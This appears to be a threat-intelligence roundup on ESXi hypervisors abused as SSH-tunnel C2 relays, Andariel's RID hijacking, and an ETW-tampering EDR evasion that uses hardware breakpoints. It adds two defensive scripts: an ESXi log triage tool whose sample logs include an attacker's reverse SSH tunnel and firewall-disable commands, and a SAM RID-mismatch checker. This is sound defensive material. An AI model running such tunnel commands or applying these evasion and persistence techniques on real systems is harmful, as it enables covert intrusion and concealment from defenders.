Researchers at Sygnia have found that ransomware operators targeting VMware ESXi hosts are not only encrypting virtual machines but also turning the compromised hypervisors into covert relays for command-and-control (C2) traffic. ESXi appliances suit this role because they are rarely rebooted, seldom run EDR agents, and are thinly monitored, so a tunnel on them survives and goes unnoticed. Attackers gain access with stolen administrative credentials or by exploiting a known vulnerability, enable the SSH service, and then set up SSH tunnels (reverse port forwarding with ssh -R, or a SOCKS proxy) through which C2 traffic flows. Sygnia recommends reviewing the ESXi logs that record shell and SSH activity (/var/log/shell.log, /var/log/hostd.log, /var/log/auth.log and /var/log/vobd.log) and forwarding them to a central syslog or SIEM, since logs kept only on the host can be truncated by the intruder.

Separately, North Korea's Andariel group has been observed using RID hijacking: with SYSTEM-level access, the attacker creates a low-privileged local account (typically a hidden one whose name ends in $) and edits its entry in the SAM registry hive so that its stored relative identifier (RID) matches that of the built-in Administrator (RID 500). Windows then grants the account administrative rights at logon while it still looks like an ordinary user, so the change evades casual review.

Finally, researchers have described a new EDR evasion technique that uses hardware breakpoints to tamper with Event Tracing for Windows (ETW). Instead of calling SetThreadContext, which EDRs commonly hook, the attacker loads the debug registers by passing a crafted CONTEXT to NtContinue; a breakpoint on the ETW event-writing path (NtTraceEvent) then hands control to a user-mode exception handler that can suppress or alter the event before it is logged, all without patching kernel code or the ntdll function bodies whose integrity EDRs check.
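What Sygnia's advice to review ESXi logs looks like in practice, as an added example that is not code from the original article or from Sygnia: a small triage script that scans lines in the style of ESXi's shell.log, auth.log and hostd.log for the chain of events behind an SSH tunnel (SSH service started, root login from an unexpected source, firewall change, ssh run from the ESXi shell with a forwarding flag). The sample log lines, the allowlist of jump hosts and the exact wording of the hostd message are constructed for the example.

```python
"""Triage of ESXi shell/auth/hostd log lines for signs of SSH tunnelling.

Added example, not code from the original article or from Sygnia. The log
lines below are constructed in the style of ESXi logs and the rule set is a
minimal illustration of the article's recommendation to review ESXi logs.
"""
import re
from dataclasses import dataclass

# Constructed sample lines (not real host data). In a real investigation these
# come from /var/log/shell.log, /var/log/auth.log and /var/log/hostd.log,
# ideally via syslog forwarding so the attacker cannot truncate them on the host.
SAMPLE_LOGS = """\
2025-01-15T10:18:02Z hostd[2101011]: Service TSM-SSH started
2025-01-15T10:19:40Z sshd[2101150]: Accepted password for root from 203.0.113.10 port 51422 ssh2
2025-01-15T10:21:33Z shell[2101184]: [root]: esxcli network firewall set --enabled false
2025-01-15T10:21:58Z shell[2101184]: [root]: ssh -fN -R 127.0.0.1:1080:10.0.0.5:443 relay@203.0.113.10
2025-01-15T10:22:10Z shell[2101184]: [root]: ls /vmfs/volumes
2025-01-15T11:02:07Z sshd[2101190]: Accepted publickey for root from 10.0.0.20 port 40122 ssh2
"""

# Assumed allowlist of jump hosts from which interactive SSH to ESXi is expected.
ALLOWED_SOURCES = {"10.0.0.20"}


@dataclass
class Finding:
    rule: str
    line: str


# ssh invoked with a forwarding flag (-R remote, -L local, -D dynamic/SOCKS, -w tun).
TUNNEL_RE = re.compile(r"\bssh\b(?:\s+\S+)*?\s+-[A-Za-z]*[RLDw]\b")
# Any ssh client run from the ESXi shell at all; outbound SSH from a hypervisor is unusual.
SHELL_SSH_RE = re.compile(r"\bshell\[\d+\]:.*\bssh\b")
# Any change to the ESXi firewall state or a ruleset (used to let the tunnel out).
FIREWALL_RE = re.compile(r"esxcli network firewall\b.*--enabled\s+(?:true|false)")
# Successful SSH authentication: capture the user and the source address.
AUTH_RE = re.compile(r"Accepted \S+ for (\S+) from (\S+) port \d+")
# The SSH daemon (TSM-SSH) being started; it is disabled by default on ESXi.
SSH_SERVICE_RE = re.compile(r"TSM-SSH\b.*\bstart")


def triage(log_text, allowed_sources):
    """Return one Finding per (line, rule) match, in log order."""
    findings = []
    for line in log_text.splitlines():
        if SSH_SERVICE_RE.search(line):
            findings.append(Finding("ssh_service_started", line))
        m = AUTH_RE.search(line)
        if m and m.group(2) not in allowed_sources:
            findings.append(Finding("ssh_login_unknown_source", line))
        if FIREWALL_RE.search(line):
            findings.append(Finding("firewall_changed", line))
        if TUNNEL_RE.search(line):
            findings.append(Finding("ssh_tunnel", line))
        elif SHELL_SSH_RE.search(line):
            findings.append(Finding("outbound_ssh", line))
    return findings


def tunnel_endpoints(findings):
    """Hosts that tunnel commands connect to (the user@host argument): C2 candidates."""
    hosts = set()
    for f in findings:
        if f.rule == "ssh_tunnel":
            for m in re.finditer(r"\S+@([\w.\-]+)", f.line):
                hosts.add(m.group(1))
    return hosts


if __name__ == "__main__":
    results = triage(SAMPLE_LOGS, ALLOWED_SOURCES)
    for f in results:
        print(f"{f.rule:26} {f.line}")
    print("tunnel endpoints:", sorted(tunnel_endpoints(results)))
```

The rules are deliberately narrow so they can run against forwarded syslog without tuning; the useful signal is the sequence (service start, unexpected login, firewall change, tunnel) on one host within minutes, and the user@host argument of the tunnel command gives the address to block and pivot on.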
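A check for the Andariel RID-hijacking item above, as an added example that is not code from the original article or from any vendor report: every account's registry key under HKLM\SAM\SAM\Domains\Account\Users is named after its RID in hex, and the F value inside that key carries a second copy of the RID that Windows consults at logon; RID hijacking rewrites that copy. The script compares the two for each account and reports any mismatch. It assumes the commonly documented F-value layout with the RID as a little-endian DWORD at offset 0x30 (an assumption to verify against your own hive), and the sample hive contents are constructed.

```python
"""Check SAM user entries for RID hijacking (a stored RID that does not match
the account's own key name). Added example, not code from the original article
or from any vendor report. It assumes the common layout of the F value under
HKLM\\SAM\\SAM\\Domains\\Account\\Users\\<hex RID>, in which the account's RID is
a little-endian DWORD at offset 0x30; treat that offset as an assumption.
"""
import struct

ADMINISTRATOR_RID = 500  # built-in Administrator, 0x1F4
F_RID_OFFSET = 0x30      # assumed position of the RID copy inside the F value
F_SIZE = 0x50            # assumed minimal size of the F value


def make_f_value(rid):
    """Build a minimal F value blob with the given RID at the assumed offset.

    Only used here to construct sample data. On a live system the bytes are read
    from the registry, which needs SYSTEM (for example from an offline copy of
    the SAM hive), and the rest of the structure is left as Windows wrote it.
    """
    f = bytearray(F_SIZE)
    struct.pack_into("<I", f, F_RID_OFFSET, rid)
    return bytes(f)


def stored_rid(f_value):
    """RID recorded inside the F value (the one Windows uses at logon)."""
    if len(f_value) < F_RID_OFFSET + 4:
        raise ValueError("F value too short")
    return struct.unpack_from("<I", f_value, F_RID_OFFSET)[0]


def find_rid_hijacks(users):
    """users maps the Users subkey name (hex RID, e.g. '000003E9') to its F value.

    Returns (key_name, key_rid, stored_rid) for every account whose stored RID
    differs from the RID its key name says it has. A low-privileged account
    whose stored RID is 500 is exactly the case described above.
    """
    hits = []
    for key_name, f_value in users.items():
        key_rid = int(key_name, 16)
        rid = stored_rid(f_value)
        if rid != key_rid:
            hits.append((key_name, key_rid, rid))
    return hits


# Constructed sample hive contents: Administrator (500), Guest (501), a normal
# local user (1001), and a hidden account with RID 1009 whose stored RID was
# rewritten to 500.
SAMPLE_USERS = {
    "000001F4": make_f_value(500),
    "000001F5": make_f_value(501),
    "000003E9": make_f_value(1001),
    "000003F1": make_f_value(500),
}

if __name__ == "__main__":
    for key_name, key_rid, rid in find_rid_hijacks(SAMPLE_USERS):
        tag = " (Administrator)" if rid == ADMINISTRATOR_RID else ""
        print(f"{key_name}: key RID {key_rid} but stored RID {rid}{tag}")
```

Because the hijacked account keeps its original name and its own key, listing local users or group membership shows nothing unusual; the mismatch between the key name and the RID stored in F is the durable artefact to look for, and a stored RID of 500 on any key other than 000001F4 should be treated as a confirmed hijack.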